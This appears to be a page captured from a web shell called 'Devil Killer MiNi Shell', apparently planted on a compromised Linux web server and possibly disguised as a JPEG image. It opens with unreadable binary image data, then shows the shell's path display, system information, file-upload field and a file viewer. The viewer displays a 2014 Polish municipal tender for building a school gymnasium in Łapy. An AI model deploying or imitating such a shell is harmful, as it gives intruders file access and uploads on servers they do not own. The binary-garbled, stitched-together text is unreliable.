JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140811/266986-N-2014.html

<p class="kh_header"><b>Łapy: Budowa sali gimnastycznej z zapleczem technicznym i sanitarno-szatniowym przy Zespole Szkół w Łapach przy ul. Letniej 1 wraz z zagospodarowaniem terenu i instalacjami doziemnymi.</b><br>
<b>Numer ogłoszenia: 266986 - 2014; data zamieszczenia: 11.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Łapach , ul. gen. Wł. Sikorskiego 24, 18-100 Łapy, woj. podlaskie, tel. 085 7152251, faks 085 7152256.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sali gimnastycznej z zapleczem technicznym i sanitarno-szatniowym przy Zespole Szkół w Łapach przy ul. Letniej 1 wraz z zagospodarowaniem terenu i instalacjami doziemnymi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu zadania pn Budowa sali gimnastycznej z zapleczem technicznym i sanitarno-szatniowym przy Zespole Szkół w Łapach przy ul. Letniej 1 wraz z zagospodarowaniem terenu i instalacjami doziemnymi.
Teren inwestycji położony jest  w Łapach oznaczonych numerami geodezyjnymi 89 i 85/1.
1. Ogólna charakterystyka projektowanej inwestycji.
Projektowany budynek jest obiektem użyteczności publicznej, spełniającym funkcje zaplecza sportowego Zespołu Szkół w Łapach. Obiekt niski, jednokondygnacyjny, niepodpiwniczony. Obiekt składa się z głównej sali ćwiczeń oraz związanych z nią  konstrukcyjnie i funkcjonalnie sali ćwiczeń korekcyjnych, pomieszczeń socjalnych i technicznych oraz komunikacji.
2. Rozwiązania funkcjonalno - przestrzenne.   
Sala gimnastyczna z zapleczem została zaprojektowana jako obiekt samodzielny, powiązany funkcjonalnie z istniejącą szkołą. Sala spełnia wyłącznie funkcję zaplecza sportowego szkoły. Obiekt zapewnia możliwość realizacji programów i zajęć obejmujących następujące dyscypliny sportowe: koszykówka, siatkówka, badminton, zajęcia ćwiczeń siłowych i ogólnorozwojowych.                                
A.	Sala główna 
Zgodnie z  wytycznymi główna arena sportowa ma wym. brutto 24,05 x 13,85 m i wysokości netto 6,65 m. Na arenie zlokalizowano następujące boiska :
a)	W układzie podłużnym (linie pól malowane w całości):
- boisko do siatkówki o wymiarach 9x18m 
-1 boisko do minikoszykówki o wymiarach  11,1x22,1m 
-1 boisko do badmintona o wymiarach 6,1x13,4m
b) W układzie poprzecznym (linie pół nie malowane,  jedynie znaczniki narożników):2 boiska treningowe do koszykówki o wymiarach 7,7x11,1m 
Istnieje możliwość podziału sali głównej na 2 powierzchnie ćwiczebne o wym: 12x13,85m, 
B.	Sala ćwiczeń korekcyjnych
Zaprojektowano salę gimnastyki korekcyjnych o pow. 50,6m2 z zapleczem. W sali oprócz gimnastyki korekcyjnej można prowadzić zajęcia  taneczne oraz gry stołowe typu tenis stołowy, bilard, piłkarzyki.
C.	Pomieszczenia socjalne
Zaprojektowano 2 zespoły szatniowe z węzłami sanitarnymi, co umożliwia wykorzystanie Sali przez 2 grupy uczniów (każda grupa max. 25 osób).                                                                                                            
D. Pomieszczenia techniczne
Zaprojektowano pomieszczenie wentylatorki o pow. 21,56m
E. Pomieszczenia magazynowe.
Zaprojektowano magazyn sprzętu sportowego o pow. 19.26 m2 dostępny z sali głównej i korytarza głównego. Zaprojektowano także zaplecze  o pow. 11.50 m2 dostępne z pomieszczenia sali gimnastyki korekcyjnej
F.	Komunikacja
Od strony południowo - zachodniej budynku znajduje się wejście główne do projektowanego obiektu. Projektowany obiekt jest powiązany komunikacją wewnętrzną (korytarzem) z istniejącym budynkiem szkoły. Z projektowanej Sali gimnastycznej prowadzi bezpośrednio na zewnątrz jedno wyjście ewakuacyjne, drugie wyjście łączy główna salę ćwiczeń z komunikacją wewnętrzną.
3. Roboty budowlane w istniejącym budynku szkoły związane z projektowaną            Salą gimnastyczną
Prace modernizacyjne w istniejącym budynku szkoły obejmują:
-Zaadaptowanie pomieszczeń istniejącej klasy na pomieszczenia przebieralni          z zapleczami sanitarnymi poprzez wyburzenie istniejących fragmentów ścian, demontaż drzwi, wykonanie otworów w istniejących ścianach i wstawienie drzwi, zamurowanie istniejących otworów okiennych i drzwiowych oraz wykonanie nowych fragmentów ścian i słupów wzmacniających  
-Montaż drzwi p.poż o odporności EI 60 w miejscu połączenia istniejącej komunikacji w podpiwniczeniu z przeprojektowaną częścią istniejącej szkoły
-Demontaż jednego okna na parterze istniejącej szkoły, zamurowanie części otworu i wstawienie mniejszego okna o wys. 150cm
-Przeprojektowanie istniejącej kotłowni polegające na wstawienie nowego kotła gazowego co łączy się z wyburzeniem fragmentów istniejących ścian i wykonaniem nowych otworów w istniejących ścianach i stropach
4. Charakterystyczne parametry techniczne budynku
A.  Zestawienie pomieszczeń: 
a) Sala ćwiczeń - 333,12 m2
b) Magazyn sprzętu sportowego - 19,26 m2
c) Wentylatornia - 21,56 m2
d) Zaplecze 11,50 m2
e) Sala gimnastyki korekcyjnej - 50,60 m2
f) Przedsionek - 4,13 m2
g) Komunikacja - 50,31 m2
h) Przebieralnia - 13,67 m2
i) Węzeł sanitarny - 13,60 m2
j) Węzeł sanitarny - 13,60 m2
k) Przebieralnia 13,67 m2
Razem 545,02 m2
B. Dane techniczno - ekonomiczne budynku sali sportowej:
a) Długość - 33,39 m.,
b) Szerokość (parter wraz z łącznikiem) - 24,95 m.,
c) Ilość kondygnacji - 1,
d) Wysokość budynku - 8,35 m.,
e) Powierzchnia zabudowy Pz - 535,35 m2,,
f) Powierzchnia całkowita bud. Pc - 622,00 m2,
g) Kubatura - 3 175,00 m3,
h) Pow. Użytkowa budynku (pow. netto) - 545,02 m2
1. Pow. użytkową policzono zgodnie z PN-70 B-02365  - w stanie surowym
2. Pow. zabudowy, pow całkowitą kond. i kubaturę policzono wg PN-ISO9836
5. Warunki gruntowo-wodne
- Warunki gruntowo-wodne ustala się w oparciu o opinię geotechniczną i dokumentacje badania podłoża gruntowego opracowaną przez firmę Geobart Bartosza Jacewicza w marcu 2014 r.
- W oparciu o powyższe stwierdza się występowanie w poziomie posadowienia gruntów sypkich w postaci piasków drobnych i średnich o stopniu zagęszczenia ID=0,46-0,53. Na fragmencie projektowanej zabudowy występuje w poziomie posadowienia soczewka gliny piaszczystej twardoplastycznej IL=0,24 z grupy konsolidacji B. 
- Wody gruntowej do głębokości 6,0m  nie nawiercono.
- Wykop z uwagi na w/w soczewkę gliny należy chronić przed napływem wody opadowej. 
- Projektowany obiekt zalicza się do II kategorii geotechnicznej.
- W oparciu o powyższe stwierdza się, że grunt nadaje się do posadowienia bezpośredniego.
- Po wykonaniu wykopów należy dokonać odbioru gruntu przez uprawnionego geologa.
UWAGA: W przypadku napotkania innych gruntów niż opisane powyżej, należy niezwłocznie powiadomić projektanta. 
6. Dane ogólne dotyczące elementów konstrukcyjno-budowlanych
Projektowany obiekt składa się z sali głównej oraz części socjalno-dydaktycznej połączonej z budynkiem istniejącej szkoły. Modernizacji pod kątem konstrukcyjnym podlega również część obiektu istniejącego (w poziomie przyziemia). Sala główna projektowana jest jako jednonawowa o szkieletowej konstrukcji ścian (żelbetowe słupy i podciągi z wypełnieniem ze ścian murowanych) oraz stalowej konstrukcji dachu. Rozmiary modularne sali głównej w rzucie wynoszą 14,10x24,30. Konstrukcja stalowa  stężona na parcie i ssanie wiatru oraz siły powodujące wyboczenie rygli za pomocą stężeń dachowych. Stężenia poprzeczne i podłużne usztywniają zwieńczenie ścian podłużnych i szczytowych. Reakcje od stężeń poprzecznych przenoszą ściany podłużne Sali sportowej (ściany żelbetowe, słupy, podciągi, wieńce oraz wypełnienie w postaci ściany murowanej).
Część socjalno-dydaktyczna połączona z budynkiem istniejącym projektowana jest jako jednokondygnacyjna, w technologii tradycyjnej z wylewanymi stropami i słupami żelbetowymi oraz ścianami murowanymi. Posadowienie na stopach, płycie i ławach fundamentowych.Ściany fundamentowe żelbetowe wylewane.Ściany konstrukcyjne murowane z bloczków wapienno-piaskowych drążonych grubości 25 cm klasy 15 na zaprawie cementowej marki 10. Dach nad częścią socjalną jednospadowy, niewentylowany.                  
7. Instalacje sanitarne 
A.	Budynek istniejący
Istniejący budynek szkoły posiada przyłącze kanalizacji sanitarnej i wodociągowej. Na potrzeby c.o. i c.w.u. zasilany jest z kotła gazowego zlokalizowanego w kotłowni.           
Prace budowlane w budynku istniejącym dostosowujące istniejącą instalację do potrzeb nowoprojektowanej cześci będą obejmowały:
-Likwidacja jednego z wylotów kanalizacji sanitarnej i przełączenie urządzenia do projektowanej kanalizacji sanitarnej
-Zainstalowanie nowego kotła gazowego, który będzie pokrywał zapotrzebowanie ciepła na potrzeby c.w.u., istniejący kocioł będzie pokrywał zapotrzebowanie ciepła na c.o.
-Likwidacja istniejącego przyłącza wodociągowego i zaprojektowanie nowego przyłącza.
B.	Budynek projektowany
a.	Instalacje wody zimnej.
Zasilanie projektowanego budynku z istniejącej instalacji wodociągowej poprzez włączenie do istniejącego odgałęzienia
b.	Instalacje ciepłej wody użytkowej  i cyrkulacji.
W związku ze zwiększeniem sumarycznego zapotrzebowania ciepła projektuje się dodatkowy kocioł gazowy. Zasilanie projektowanego budynku z istniejącej instalacji c.w.u. i cyrkulacji poprzez włączenie do istniejącego odgałęzienia
Projektuje się zwiększenie średnicy ciepłej wody użytkowej i cyrkulacji na leżakach głównych.
c.	Instalacje kanalizacji sanitarnej .
Projektowany budynek sali gimnastycznej będzie posiadał nowe przyłącze kanalizacji sanitarnej.
d.	Instalacje kanalizacji deszczowej.
Teren objęty opracowaniem nie posiada sieci kanalizacji deszczowej. Wody opadowe z projektowanych dachów zostaną odprowadzane na tereny zielone
e.	Instalacja c.o.
Zasilanie projektowanej Sali Gimnastycznej będzie z istniejącego odgałęzienia       instalacji c.o. Projektuje się instalację wodną pompową z rozdziałem dolnym w układzie zamkniętym o parametrach 80/60 oC
f.	Instalacja wentylacji mechanicznej.
Projektowana instalacja wentylacyjna składa się z następujących układów:
-Układ N1-W1 - N =3050 m3/h, W=3050 m3/h - wentylacja sali 
-Układ N2-W2 - N =860 m3/h, W=720 m3/h - wentylacja zaplecza sali
-Układ W3 - W=160 m3/h - wentylacja WC zaplecza sali
g.	Instalacja gazowa.
Zmiana instalacji wewnętrznej gazowej  budynku obejmuje podłączenie dodatkowego  odbiornika gazu - kotła jednofunkcyjnego c.w.u. typu Elitec DTG17 ECO.NOX o mocy 37 kW.
h.	Instalacje p.poż.
Instalacja p.poż.w projektowanym budynku została zaprojektowana zgodnie z PN-EN 671-1:1999
8.	Instalacje elektryczne
W budynku projektuje się następujące instalacje
- Rozdzielnie  i tablice bezpiecznikowe.
- Obwody rozdzielcze (wlz-ty).
- Wewnętrzne instalacje elektryczne.
- Oświetlenie pomieszczeń
- Ochrony przeciwprzepięciowej.
- Instalacja odgromową
- Ochrona przeciwporażeniową
Zasilanie obiektu w energię elektryczna odbywać się będzie projektowanego przyłącza zakończonego  złączem  kablowym zlokalizowanym przy granicy działki.
Od złącza projektuje się wewnętrzna linie zasilającą kablem YKYXS 5x25mm2 
W budynku projektuje się wykonanie tablicy głównej TG w obudowie metalowej umieszczonej  na korytarza. W tablicy głównej TG znajdować się będą: główny wyłącznik p.poż, ochronnik przeciw przepięciowy, rozłączniki bezpiecznikowe, wyłączniki nadprądowe, bloki rozdzielcze. Przy wejściach głównych projektuje się wykonanie ręcznych ostrzegaczy p.poż  pozwalających wyzwolić wyłącznik główny prądu w budynku.
9. Rozwiązania dotyczące osób niepełnosprawnych
Projektowany budynek sali gimnastycznej z zapleczem  uwzględnia wymagania prawa budowlanego dotyczące osób niepełnosprawnych  i zapewnia im warunki do korzystania z budynku tj.:
a. na dojściu do budynku przewiduje się obniżenie krawężników ;
b. Główne wejścia do budynku dostępne z poziomu terenu
c. Przebieralni przystosowane są dla osób niepełnosprawnych i przy każdej z nich znajduje się sanitariat, którego gabaryty i wyposażenie umożliwiają osobom niepełnosprawnym  swobodne użytkowanie.
d. Sanitariaty przystosowane do korzystania przez osoby z dysfunkcją ruchu  oprócz wymaganej przestrzeni manewrowej o wym. 150 x 150 cm, spełniającą następujące warunki:
-ceramika łazienkowa dostosowana do potrzeb osób niepełnosprawnych,
-wpust kanalizacyjny w podłodze zamiast kabiny natryskowej,
-jednouchwytowe baterie umywalkowe i prysznicowe wyposażone w dłuższy uchwyt i ogranicznik temperatury wody,
- odpowiednie akcesoria takie jak: krzesełko prysznicowe składane oraz poręcze, uchwyty i ramiona wspierające mocowane do ściany, a  także lustro o regulowanym kącie nachylenia.
e. Pomieszczenia higieniczno sanitarne dla osób niepełnosprawnych (przebieralnie, wc, natryski) z instalacją przyzywową.
f. Brak barier architektonicznych w postaci wysokich progów itp.
g. Na schodach wewnętrznych w korytarzu zamontowano platformę przyścienną dla osób niepełnosprawnych.
h. Drzwi w pomieszczeniach dostępnych  dla osób niepełnosprawnych o wymiarach min. 90 cm..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.22.22-8, 45.20.00.00-9, 45.22.30.00-6, 45.10.00.00-8, 45.30.00.00-0, 37.40.00.00-2, 45.26.11.00-5, 45.42.10.00-4, 45.31.00.00-3, 45.33.00.00-9, 45.33.10.00-6, 45.40.00.00-1, 45.43.21.20-1, 45.23.32.53-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 pkt 1 - 4 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem w wykonaniu  w okresie ostatnich 5 lat, a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie,  co najmniej 2 robót budowlanych odpowiadających swoim rodzajem i wartością przedmiotowi  niniejszego zamówienia, tzn. polegające na budowie lub przebudowie: sali/hali gimnastycznej lub sali/hali sportowej lub sali/hali widowiskowo-sportowej o wartości brutto nie  mniejszej niż 1 500 000,00 zł każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 pkt 1 - 4 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, legitymującymi się doświadczeniem zawodowym    odpowiednim do funkcji, jakie zostaną im powierzone.
Wykonawca przedstawi w ofercie kandydatów na następujące stanowiska:
a) kierownik budowy - posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, który pełnił funkcję kierownika budowy przy min. 2 robotach ,
b) kierownik budowy lub robót elektrycznych - posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, który pełnił funkcję kierownika budowy lub robót przy min. 2 robotach,
c) kierownik budowy lub robót sanitarnych - posiadający uprawnienia budowlane do kierowania robotami w specjalności sieci i instalacji sanitarnych, który pełnił funkcję kierownika budowy lub robót przy min. 2 robotach,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 pkt 1 - 4 ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lapy.podlasie.pl; www.bip.lapy.podlasie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 18-100 Łapy, ul.Gen.Wł.Sikorskiego 24.</p>
